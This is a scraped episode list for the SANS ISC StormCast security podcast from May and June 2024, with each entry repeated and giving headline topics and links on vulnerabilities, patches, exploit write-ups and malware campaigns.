ISC StormCast for Monday, June 24th, 2024

Sysinternals Process Monitor Version 4 Released https://isc.sans.edu/diary/Sysinternals%27%20Process%20Monitor%20Version%204%20Released/31026 Kaspersky Sanctions https://home.treasury.gov/news/press-releases/jy2420 Phoenix UEFI Buffer Overflow Affects Wide Range of Systems https://eclypsium.com/blog/ueficanhazbufferoverflow-widespread-impact-from-vulnerability-in-popular-pc-and-server-firmware/ Ghostscript Update https://ghostscript.readthedocs.io/en/gs10.03.1/News.html js2py vulnerability https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape
6/24/20247 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, June 24th, 2024

Sysinternals Process Monitor Version 4 Released https://isc.sans.edu/diary/Sysinternals%27%20Process%20Monitor%20Version%204%20Released/31026 Kaspersky Sanctions https://home.treasury.gov/news/press-releases/jy2420 Phoenix UEFI Buffer Overflow Affects Wide Range of Systems https://eclypsium.com/blog/ueficanhazbufferoverflow-widespread-impact-from-vulnerability-in-popular-pc-and-server-firmware/ Ghostscript Update https://ghostscript.readthedocs.io/en/gs10.03.1/News.html js2py vulnerability https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape
6/24/20247 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, June 21st, 2024

No Excuses: Free Tools to Help Secure Authentication in Ubuntu https://isc.sans.edu/diary/No%20Excuses%2C%20Free%20Tools%20to%20Help%20Secure%20Authentication%20in%20Ubuntu%20Linux%20%5BGuest%20Diary%5D/31024 Handling BOM MIME Files https://isc.sans.edu/diary/Handling+BOM+MIME+Files/31022 Atlasiun Confluence Data Center and Server Vuln https://confluence.atlassian.com/security/security-bulletin-june-18-2024-1409286211.html Beyond the @ Symbol: Exploiting the Flexibility of Email Addresses For Offensive Purposes https://modzero.com/en/blog/beyond_the_at_symbol/ VMWare Patches https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453
6/21/20245 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, June 21st, 2024

No Excuses: Free Tools to Help Secure Authentication in Ubuntu https://isc.sans.edu/diary/No%20Excuses%2C%20Free%20Tools%20to%20Help%20Secure%20Authentication%20in%20Ubuntu%20Linux%20%5BGuest%20Diary%5D/31024 Handling BOM MIME Files https://isc.sans.edu/diary/Handling+BOM+MIME+Files/31022 Atlasiun Confluence Data Center and Server Vuln https://confluence.atlassian.com/security/security-bulletin-june-18-2024-1409286211.html Beyond the @ Symbol: Exploiting the Flexibility of Email Addresses For Offensive Purposes https://modzero.com/en/blog/beyond_the_at_symbol/ VMWare Patches https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453
6/21/20245 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, June 18th, 2024

New NetSupport Campaign Deleivered Through MSIX Packages https://isc.sans.edu/diary/New%20NetSupport%20Campaign%20Delivered%20Through%20MSIX%20Packages/31018 D-Link Router Backdoor https://www.twcert.org.tw/en/cp-139-7880-629f5-2.html https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10398 iTerm2 Vulnerablity https://vin01.github.io/piptagole/escape-sequences/iterm2/rce/2024/06/16/iterm2-rce-window-title-tmux-integration.html NextCloud Vulnerability https://github.com/nextcloud/security-advisories/security/advisories/GHSA-9v72-9xv5-3p7c
6/18/20244 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, June 18th, 2024

New NetSupport Campaign Deleivered Through MSIX Packages https://isc.sans.edu/diary/New%20NetSupport%20Campaign%20Delivered%20Through%20MSIX%20Packages/31018 D-Link Router Backdoor https://www.twcert.org.tw/en/cp-139-7880-629f5-2.html https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10398 iTerm2 Vulnerablity https://vin01.github.io/piptagole/escape-sequences/iterm2/rce/2024/06/16/iterm2-rce-window-title-tmux-integration.html NextCloud Vulnerability https://github.com/nextcloud/security-advisories/security/advisories/GHSA-9v72-9xv5-3p7c
6/18/20244 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, June 17th, 2024

Overview of My Tools That Handle JSON Data https://isc.sans.edu/diary/Overview%20of%20My%20Tools%20That%20Handle%20JSON%20Data/31012 Python Serialization and "Sleepy Pickle" https://x.com/MarkBaggett/status/1801732554740969561 Detecting Headless Chrome https://deviceandbrowserinfo.com/learning_zone/articles/detecting-headless-chrome-puppeteer-2024 Detecting Malicious VS Code Extensions https://medium.com/@amitassaraf/4-6-introducing-extensiontotal-how-to-assess-risk-in-vs-code-extensions-3ac5bfd83fb1 ASUS Router Critical Vulnerability https://www.asus.com/content/asus-product-security-advisory/
6/17/20245 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, June 17th, 2024

Overview of My Tools That Handle JSON Data https://isc.sans.edu/diary/Overview%20of%20My%20Tools%20That%20Handle%20JSON%20Data/31012 Python Serialization and "Sleepy Pickle" https://x.com/MarkBaggett/status/1801732554740969561 Detecting Headless Chrome https://deviceandbrowserinfo.com/learning_zone/articles/detecting-headless-chrome-puppeteer-2024 Detecting Malicious VS Code Extensions https://medium.com/@amitassaraf/4-6-introducing-extensiontotal-how-to-assess-risk-in-vs-code-extensions-3ac5bfd83fb1 ASUS Router Critical Vulnerability https://www.asus.com/content/asus-product-security-advisory/
6/17/20245 minutes, 26 seconds
Episode Artwork

ISC StormCast for Friday, June 14th, 2024

The Art of JQ and Command-Line Fu https://isc.sans.edu/diary/The%20Art%20of%20JQ%20and%20Command-line%20Fu%20%5BGuest%20Diary%5D/31006 Microsoft Outlook Vulnerablity Details https://blog.morphisec.com/cve-2024-30103-microsoft-outlook-vulnerability Keeping our Outlook Personal Email Users Safe https://techcommunity.microsoft.com/t5/outlook-blog/keeping-our-outlook-personal-email-users-safe-reinforcing-our/ba-p/4164184 Exploiting ML models with pickle file attacks https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/
6/14/20245 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, June 14th, 2024

The Art of JQ and Command-Line Fu https://isc.sans.edu/diary/The%20Art%20of%20JQ%20and%20Command-line%20Fu%20%5BGuest%20Diary%5D/31006 Microsoft Outlook Vulnerablity Details https://blog.morphisec.com/cve-2024-30103-microsoft-outlook-vulnerability Keeping our Outlook Personal Email Users Safe https://techcommunity.microsoft.com/t5/outlook-blog/keeping-our-outlook-personal-email-users-safe-reinforcing-our/ba-p/4164184 Exploiting ML models with pickle file attacks https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/
6/14/20245 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, June 13th, 2024

MSMQ Packets https://isc.sans.edu/diary/Port%201801%20Traffic%3A%20Microsoft%20Message%20Queue/31004 Adobe Updates https://helpx.adobe.com/security/products/magento/apsb24-40.html Black Basta Exploited CVE-2024-26169 Prior to Patch https://symantec-enterprise-blogs.security.com/threat-intelligence/black-basta-ransomware-zero-day Pixel Phone 0-Day Patched https://source.android.com/docs/security/bulletin/pixel/2024-06-01
6/13/20245 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, June 13th, 2024

MSMQ Packets https://isc.sans.edu/diary/Port%201801%20Traffic%3A%20Microsoft%20Message%20Queue/31004 Adobe Updates https://helpx.adobe.com/security/products/magento/apsb24-40.html Black Basta Exploited CVE-2024-26169 Prior to Patch https://symantec-enterprise-blogs.security.com/threat-intelligence/black-basta-ransomware-zero-day Pixel Phone 0-Day Patched https://source.android.com/docs/security/bulletin/pixel/2024-06-01
6/13/20245 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, June 12th, 2024

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20June%202024/31000 JetBrains IntelliJ Based IDE GitHub Plugin Vulnerability https://blog.jetbrains.com/security/2024/06/updates-for-security-issue-affecting-intellij-based-ides-2023-1-and-github-plugin/ Veeam Recovery Orchestrator (VRO) vulnerability CVE-2024-29855 https://www.veeam.com/kb4585 Precor Threadmill Vulnerablity https://securityintelligence.com/x-force/internet-connected-treadmill-vulnerabilities-discovered/
6/12/20245 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, June 12th, 2024

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20June%202024/31000 JetBrains IntelliJ Based IDE GitHub Plugin Vulnerability https://blog.jetbrains.com/security/2024/06/updates-for-security-issue-affecting-intellij-based-ides-2023-1-and-github-plugin/ Veeam Recovery Orchestrator (VRO) vulnerability CVE-2024-29855 https://www.veeam.com/kb4585 Precor Threadmill Vulnerablity https://securityintelligence.com/x-force/internet-connected-treadmill-vulnerabilities-discovered/
6/12/20245 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, June 11th, 2024

Veeam Exploit CVE-2024-29849 https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/ SORBS Shutdown https://www.theregister.com/2024/06/07/sorbs_closed/ Rogue Cell Tower Shut Down in London https://www.cityoflondon.police.uk/news/city-of-london/news/2024/june/two-people-arrested-in-connection-with-investigation-into-homemade-mobile-antenna-used-to-send-thousands-of-smishing-text-messages-to-the-public/ Malicious Comfyui Modules https://www.youtube.com/watch?v=ntwGHjBCbeQ
6/11/20246 minutes, 3 seconds
Episode Artwork

ISC StormCast for Tuesday, June 11th, 2024

Veeam Exploit CVE-2024-29849 https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/ SORBS Shutdown https://www.theregister.com/2024/06/07/sorbs_closed/ Rogue Cell Tower Shut Down in London https://www.cityoflondon.police.uk/news/city-of-london/news/2024/june/two-people-arrested-in-connection-with-investigation-into-homemade-mobile-antenna-used-to-send-thousands-of-smishing-text-messages-to-the-public/ Malicious Comfyui Modules https://www.youtube.com/watch?v=ntwGHjBCbeQ
6/11/20246 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, June 10th, 2024

PHP Unicode Remote Code Execution Exploit https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/ PyTorch Distributed RPC Framework Remote Code Execution https://huntr.com/bounties/39811836-c5b3-4999-831e-46fee8fcade3 https://www.cve.org/CVERecord?id=CVE-2024-5480 Malicious VSCode Extensions Used by Researchers https://www.bleepingcomputer.com/news/security/malicious-visual-studio-code-extensions-with-millions-of-installs-discovered/
6/10/20248 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, June 10th, 2024

PHP Unicode Remote Code Execution Exploit https://www.bleepingcomputer.com/news/security/malicious-visual-studio-code-extensions-with-millions-of-installs-discovered/ PyTorch Distributed RPC Framework Remote Code Execution https://huntr.com/bounties/39811836-c5b3-4999-831e-46fee8fcade3 https://www.cve.org/CVERecord?id=CVE-2024-5480 Malicious VSCode Extensions Used by Researchers https://www.bleepingcomputer.com/news/security/malicious-visual-studio-code-extensions-with-millions-of-installs-discovered/
6/10/20248 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, June 7th, 2024

Malicious Python Script with a "Best Before" Date https://isc.sans.edu/diary/Malicious%20Python%20Script%20with%20a%20%22Best%20Before%22%20Date/30988 FBI Obtained 7,000 LockBit Ransomware Keys https://www.fbi.gov/news/speeches/fbi-cyber-assistant-director-bryan-vorndran-s-remarks-at-the-2024-boston-conference-on-cyber-security Apple Guarantees 5 Years of Security Updates https://www.androidauthority.com/iphone-software-support-commitment-3449135/ FCC Proposes New Rule for Security Routing https://www.fcc.gov/document/fcc-proposes-internet-routing-security-reporting-requirements
6/7/20246 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, June 7th, 2024

Malicious Python Script with a "Best Before" Date https://isc.sans.edu/diary/Malicious%20Python%20Script%20with%20a%20%22Best%20Before%22%20Date/30988 FBI Obtained 7,000 LockBit Ransomware Keys https://www.fbi.gov/news/speeches/fbi-cyber-assistant-director-bryan-vorndran-s-remarks-at-the-2024-boston-conference-on-cyber-security Apple Guarantees 5 Years of Security Updates https://www.androidauthority.com/iphone-software-support-commitment-3449135/ FCC Proposes New Rule for Security Routing https://www.fcc.gov/document/fcc-proposes-internet-routing-security-reporting-requirements
6/7/20246 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, June 6th, 2024

WatchGuard VPN Brutefording https://isc.sans.edu/diary/Brute%20Force%20Attacks%20Against%20Watchguard%20VPN%20Endpoints/30984 TotalRecall Tool To Extract Data from Microsoft Recall https://github.com/xaitax/TotalRecall WebEx Flaw https://www.helpnetsecurity.com/2024/06/05/cisco-webex-cloud-vulnerability/ https://netzbegruenung.de/blog/netzbegruenung-findet-schwachstellen-auch-im-cisco-webex-clouddienst-behoerden-und-unternehmen-in-ganz-europa-betroffen/ (in german)
6/6/20246 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, June 6th, 2024

WatchGuard VPN Brutefording https://isc.sans.edu/diary/Brute%20Force%20Attacks%20Against%20Watchguard%20VPN%20Endpoints/30984 TotalRecall Tool To Extract Data from Microsoft Recall https://github.com/xaitax/TotalRecall WebEx Flaw https://www.helpnetsecurity.com/2024/06/05/cisco-webex-cloud-vulnerability/ https://netzbegruenung.de/blog/netzbegruenung-findet-schwachstellen-auch-im-cisco-webex-clouddienst-behoerden-und-unternehmen-in-ganz-europa-betroffen/ (in german)
6/6/20246 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, June 5th, 2024

No Defender Yes Defender https://isc.sans.edu/diary/No-Defender%2C%20Yes-Defender/30980 Fake Job Ads Lead to Stolen Crypto Currency https://www.ic3.gov/Media/Y2024/PSA240604 Zyxel NAS Vulnerabilities https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/
6/5/20245 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, June 5th, 2024

No Defender Yes Defender https://isc.sans.edu/diary/No-Defender%2C%20Yes-Defender/30980 Fake Job Ads Lead to Stolen Crypto Currency https://www.ic3.gov/Media/Y2024/PSA240604 Zyxel NAS Vulnerabilities https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/
6/5/20245 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, June 4th, 2024

A Wireshark Lua Dissector for Fixed Field Length Protocols https://isc.sans.edu/diary/A%20Wireshark%20Lua%20Dissector%20for%20Fixed%20Field%20Length%20Protocols/30976 COX Cable Modem Admin API Weakness https://samcurry.net/hacking-millions-of-modems Malicous Stack Overflow Answers https://www.bleepingcomputer.com/news/security/cybercriminals-pose-as-helpful-stack-overflow-users-to-push-malware/ Atlasian Confluence Data Center and SErver Remote Code Execution Vuln CVE-2024-21683 https://blog.sonicwall.com/en-us/2024/05/confluence-data-center-and-server-remote-code-execution-vulnerability/
6/4/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, June 4th, 2024

A Wireshark Lua Dissector for Fixed Field Length Protocols https://isc.sans.edu/diary/A%20Wireshark%20Lua%20Dissector%20for%20Fixed%20Field%20Length%20Protocols/30976 COX Cable Modem Admin API Weakness https://samcurry.net/hacking-millions-of-modems Malicous Stack Overflow Answers https://www.bleepingcomputer.com/news/security/cybercriminals-pose-as-helpful-stack-overflow-users-to-push-malware/ Atlasian Confluence Data Center and SErver Remote Code Execution Vuln CVE-2024-21683 https://blog.sonicwall.com/en-us/2024/05/confluence-data-center-and-server-remote-code-execution-vulnerability/
6/4/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, June 3rd, 2024

K1w1 Infostealer Uses gofile.io for Exfiltration https://isc.sans.edu/diary/%22K1w1%22%20InfoStealer%20Uses%20gofile.io%20for%20Exfiltration/30972 Kaspersky Linux Malware Scanner https://www.kaspersky.com/blog/kvrt-for-linux/51375/ Snowflake Incident https://www.helpnetsecurity.com/2024/06/01/snowflake-breach-data-theft/ HuggingFace Space Secrets Leak https://huggingface.co/blog/space-secrets-disclosure
6/3/20245 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, June 3rd, 2024

K1w1 Infostealer Uses gofile.io for Exfiltration https://isc.sans.edu/diary/%22K1w1%22%20InfoStealer%20Uses%20gofile.io%20for%20Exfiltration/30972 Kaspersky Linux Malware Scanner https://www.kaspersky.com/blog/kvrt-for-linux/51375/ Snowflake Incident https://www.helpnetsecurity.com/2024/06/01/snowflake-breach-data-theft/ HuggingFace Space Secrets Leak https://huggingface.co/blog/space-secrets-disclosure
6/3/20245 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, May 31st, 2024

Feeding MISP with OSSEC https://isc.sans.edu/diary/Feeding%20MISP%20with%20OSSEC/30968 Checkpoint VPN https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ The Pumpkin Eclipse https://blog.lumen.com/the-pumpkin-eclipse/ Michael Dunking: Detecting Cypher Injection with Open-Source Network Intrusion Detection https://www.sans.edu/cyber-research/detecting-cypher-injection-with-open-source-network-intrusion-detection/
5/31/202415 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, May 31st, 2024

Feeding MISP with OSSEC https://isc.sans.edu/diary/Feeding%20MISP%20with%20OSSEC/30968 Checkpoint VPN https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ The Pumpkin Eclipse https://blog.lumen.com/the-pumpkin-eclipse/ Michael Dunking: Detecting Cypher Injection with Open-Source Network Intrusion Detection https://www.sans.edu/cyber-research/detecting-cypher-injection-with-open-source-network-intrusion-detection/
5/31/202415 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, May 30th, 2024

Is that It? Finding the Unknown: Correlations Between Honeypot Logs and PCAPs https://isc.sans.edu/diary/Is%20that%20It%3F%20%20Finding%20the%20Unknown%3A%20Correlations%20Between%20Honeypot%20Logs%20%26%20PCAPs%20%5BGuest%20Diary%5D/30962 Checkpoint 0-Day https://blog.checkpoint.com/security/enhance-your-vpn-security-posture Okta warns of Credential Stuffing Against Customer Identity Cloud https://sec.okta.com/articles/2024/05/detecting-cross-origin-authentication-credential-stuffing-attacks Brute Forcing Old Bitcoin Wallet Password https://www.youtube.com/watch?v=o5IySpAkThg
5/30/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, May 30th, 2024

Is that It? Finding the Unknown: Correlations Between Honeypot Logs and PCAPs https://isc.sans.edu/diary/Is%20that%20It%3F%20%20Finding%20the%20Unknown%3A%20Correlations%20Between%20Honeypot%20Logs%20%26%20PCAPs%20%5BGuest%20Diary%5D/30962 Checkpoint 0-Day https://blog.checkpoint.com/security/enhance-your-vpn-security-posture Okta warns of Credential Stuffing Against Customer Identity Cloud https://sec.okta.com/articles/2024/05/detecting-cross-origin-authentication-credential-stuffing-attacks Brute Forcing Old Bitcoin Wallet Password https://www.youtube.com/watch?v=o5IySpAkThg
5/30/20245 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, May 29th, 2024

Preventing SQL Injection with Python https://www.youtube.com/watch?v=1cQy9N1Xndk PoC Exploit for CVE-2024-23108 in Fortinet FortiSIEM https://www.horizon3.ai/attack-research/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive/ ShrinkLocker: Turning BitLocker into ransomware https://securelist.com/ransomware-abuses-bitlocker/112643/ iconv buffer overflow PoC 2024-2961 https://github.com/ambionics/cnext-exploits/ PoC for Apple Priv. Escalation bug CVE-2024-27842 https://github.com/wangtielei/POCs/tree/main/CVE-2024-27842 https://x.com/WangTielei
5/29/20244 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, May 29th, 2024

Preventing SQL Injection with Python https://www.youtube.com/watch?v=1cQy9N1Xndk PoC Exploit for CVE-2024-23108 in Fortinet FortiSIEM https://www.horizon3.ai/attack-research/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive/ ShrinkLocker: Turning BitLocker into ransomware https://securelist.com/ransomware-abuses-bitlocker/112643/ iconv buffer overflow PoC 2024-2961 https://github.com/ambionics/cnext-exploits/ PoC for Apple Priv. Escalation bug CVE-2024-27842 https://github.com/wangtielei/POCs/tree/main/CVE-2024-27842 https://x.com/WangTielei
5/29/20244 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, May 28th, 2024

Files with TGZ Extension used as malspam attachements https://isc.sans.edu/diary/Files%20with%20TXZ%20extension%20used%20as%20malspam%20attachments/30958 Google 0-Day https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_23.html Google Stops Trusting Globaltrust CA https://groups.google.com/a/ccadb.org/g/public/c/wRs-zec8w7k/m/G_9QprJ2AQAJ Checkpoint warns of password bruteforcing https://blog.checkpoint.com/security/enhance-your-vpn-security-posture?campaign=checkpoint&eid=guvrs&advisory=1 SEC522: Defending Web Applications isc.sans.edu/j/sec522
5/28/20246 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, May 28th, 2024

Files with TGZ Extension used as malspam attachements https://isc.sans.edu/diary/Files%20with%20TXZ%20extension%20used%20as%20malspam%20attachments/30958 Google 0-Day https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_23.html Google Stops Trusting Globaltrust CA https://groups.google.com/a/ccadb.org/g/public/c/wRs-zec8w7k/m/G_9QprJ2AQAJ Checkpoint warns of password bruteforcing https://blog.checkpoint.com/security/enhance-your-vpn-security-posture?campaign=checkpoint&eid=guvrs&advisory=1 SEC522: Defending Web Applications isc.sans.edu/j/sec522
5/28/20246 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, May 24th, 2024

Analysis of 'redtail' file uploads to ISC Honeypot https://isc.sans.edu/diary/Analysis%20of%20%3Fredtail%3F%20File%20Uploads%20to%20ICS%20Honeypot%2C%20a%20Multi-Architecture%20Coin%20Miner%20%5BGuest%20Diary%5D/30950 Veeam Vulnerablity https://www.veeam.com/kb4581 C-Root Server Lost Touch With Peers https://arstechnica.com/security/2024/05/dns-glitch-that-threatened-internet-stability-fixed-cause-remains-unclear/ Ivanti Vulnerabilities https://forums.ivanti.com/s/article/Avalanche-6-4-3-602-additional-security-hardening-and-CVE-fixed?language=en_US Justice AV Solutions Software Backdoor https://www.rapid7.com/blog/post/2024/05/23/cve-2024-4978-backdoored-justice-av-solutions-viewer-software-used-in-apparent-supply-chain-attack/
5/24/20247 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, May 24th, 2024

Analysis of 'redtail' file uploads to ISC Honeypot https://isc.sans.edu/diary/Analysis%20of%20%3Fredtail%3F%20File%20Uploads%20to%20ICS%20Honeypot%2C%20a%20Multi-Architecture%20Coin%20Miner%20%5BGuest%20Diary%5D/30950 Veeam Vulnerablity https://www.veeam.com/kb4581 C-Root Server Lost Touch With Peers https://arstechnica.com/security/2024/05/dns-glitch-that-threatened-internet-stability-fixed-cause-remains-unclear/ Ivanti Vulnerabilities https://forums.ivanti.com/s/article/Avalanche-6-4-3-602-additional-security-hardening-and-CVE-fixed?language=en_US Justice AV Solutions Software Backdoor https://www.rapid7.com/blog/post/2024/05/23/cve-2024-4978-backdoored-justice-av-solutions-viewer-software-used-in-apparent-supply-chain-attack/
5/24/20247 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, May 23rd, 2024

NMAP Scanning Without Scanning - The ipinfo API https://isc.sans.edu/diary/NMAP%20Scanning%20without%20Scanning%20%28Part%202%29%20-%20The%20ipinfo%20API/30948 Why Your WiFi Router Doubles As An Apple Airtag https://krebsonsecurity.com/2024/05/why-your-wi-fi-router-doubles-as-an-apple-airtag/#more-67551 https://account.microsoft.com/privacy/location-services-opt-out https://answers.microsoft.com/en-us/windows/forum/all/wifi-sense-my-ssid-includes-optout-why-do-windows/1453142a-755a-476f-aa48-56d05b89e33c https://www.computerworld.com/article/1484722/here-s-how-to-opt-out-of-google-s-wi-fi-snooping.html https://www.privacy.org.nz/publications/commissioner-inquiries/google-s-collection-of-wifi-information-during-street-view-filming/
5/23/20249 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, May 23rd, 2024

NMAP Scanning Without Scanning - The ipinfo API https://isc.sans.edu/diary/NMAP%20Scanning%20without%20Scanning%20%28Part%202%29%20-%20The%20ipinfo%20API/30948 Why Your WiFi Router Doubles As An Apple Airtag https://krebsonsecurity.com/2024/05/why-your-wi-fi-router-doubles-as-an-apple-airtag/#more-67551 https://account.microsoft.com/privacy/location-services-opt-out https://answers.microsoft.com/en-us/windows/forum/all/wifi-sense-my-ssid-includes-optout-why-do-windows/1453142a-755a-476f-aa48-56d05b89e33c https://www.computerworld.com/article/1484722/here-s-how-to-opt-out-of-google-s-wi-fi-snooping.html https://www.privacy.org.nz/publications/commissioner-inquiries/google-s-collection-of-wifi-information-during-street-view-filming/
5/23/20249 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, May 22nd, 2024

Scanning without Scanning with nmap https://isc.sans.edu/diary/Scanning%20without%20Scanning%20with%20NMAP%20%28APIs%20FTW%29/30944 iTerm2 Vulnerablities https://vin01.github.io/piptagole/escape-sequences/iterm2/hyper/url-handlers/code-execution/2024/05/21/arbitrary-url-schemes-terminal-emulators.html GitHub Enterprise Vulnerablity CVE-2024-4985 https://nvd.nist.gov/vuln/detail/CVE-2024-4985 BitBucket Pipelines Leaking Secrets https://cloud.google.com/blog/topics/threat-intelligence/bitbucket-pipeline-leaking-secrets Microsoft Recall Privacy https://www.microsoft.com/en-us/windows/copilot-plus-pcs?r=1#faq1
5/22/20246 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, May 22nd, 2024

Scanning without Scanning with nmap https://isc.sans.edu/diary/Scanning%20without%20Scanning%20with%20NMAP%20%28APIs%20FTW%29/30944 iTerm2 Vulnerablities https://vin01.github.io/piptagole/escape-sequences/iterm2/hyper/url-handlers/code-execution/2024/05/21/arbitrary-url-schemes-terminal-emulators.html GitHub Enterprise Vulnerablity CVE-2024-4985 https://nvd.nist.gov/vuln/detail/CVE-2024-4985 BitBucket Pipelines Leaking Secrets https://cloud.google.com/blog/topics/threat-intelligence/bitbucket-pipeline-leaking-secrets Microsoft Recall Privacy https://www.microsoft.com/en-us/windows/copilot-plus-pcs?r=1#faq1
5/22/20246 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, May 21st, 2024

Analyzing MSG Files https://isc.sans.edu/diary/Analyzing%20MSG%20Files/30940 Linguistic Lumberjack: Fluent Bit Vulnerability CVE-2024-4323 https://www.tenable.com/blog/linguistic-lumberjack-attacking-cloud-services-via-logging-endpoints-fluent-bit-cve-2024-4323 Fortinet FortiSIEM Command Injection Deep-Dive CVE-2023-23992 https://www.horizon3.ai/attack-research/cve-2023-34992-fortinet-fortisiem-command-injection-deep-dive/ Git Vulnerability CVE-2024-32002 PoC https://amalmurali.me/posts/git-rce/ Google Chrome CVE-2024-4947 PoC https://buptsb.github.io/blog/post/CVE-2024-4947-%20v8%20incorrect%20AccessInfo%20for%20module%20namespace%20object%20causes%20Maglev%20type%20confusion.html
5/21/20245 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, May 21st, 2024

Analyzing MSG Files https://isc.sans.edu/diary/Analyzing%20MSG%20Files/30940 Linguistic Lumberjack: Fluent Bit Vulnerability CVE-2024-4323 https://www.tenable.com/blog/linguistic-lumberjack-attacking-cloud-services-via-logging-endpoints-fluent-bit-cve-2024-4323 Fortinet FortiSIEM Command Injection Deep-Dive CVE-2023-23992 https://www.horizon3.ai/attack-research/cve-2023-34992-fortinet-fortisiem-command-injection-deep-dive/ Git Vulnerability CVE-2024-32002 PoC https://amalmurali.me/posts/git-rce/ Google Chrome CVE-2024-4947 PoC https://buptsb.github.io/blog/post/CVE-2024-4947-%20v8%20incorrect%20AccessInfo%20for%20module%20namespace%20object%20causes%20Maglev%20type%20confusion.html
5/21/20245 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, May 20th, 2024

Another PDF Streams Example: Extracting JPEGs https://isc.sans.edu/diary/Another%20PDF%20Streams%20Example%3A%20Extracting%20JPEGs/30924 QNAP QTS QNAPping At the Wheel https://labs.watchtowr.com/qnap-qts-qnapping-at-the-wheel-cve-2024-27130-and-friends/ May 2024 Security Update Problems with Windows 2019 https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-1809-and-windows-server-2019#3299msgdesc Dlink Vulnerabilities Exploited https://www.cisa.gov/news-events/alerts/2024/05/16/cisa-adds-three-known-exploited-vulnerabilities-catalog Ivanti PoC Exploit CVE 2024-22026 https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core
5/20/20246 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, May 20th, 2024

Another PDF Streams Example: Extracting JPEGs https://isc.sans.edu/diary/Another%20PDF%20Streams%20Example%3A%20Extracting%20JPEGs/30924 QNAP QTS QNAPping At the Wheel https://labs.watchtowr.com/qnap-qts-qnapping-at-the-wheel-cve-2024-27130-and-friends/ May 2024 Security Update Problems with Windows 2019 https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-1809-and-windows-server-2019#3299msgdesc Dlink Vulnerabilities Exploited https://www.cisa.gov/news-events/alerts/2024/05/16/cisa-adds-three-known-exploited-vulnerabilities-catalog Ivanti PoC Exploit CVE 2024-22026 https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core
5/20/20246 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, May 17th, 2024

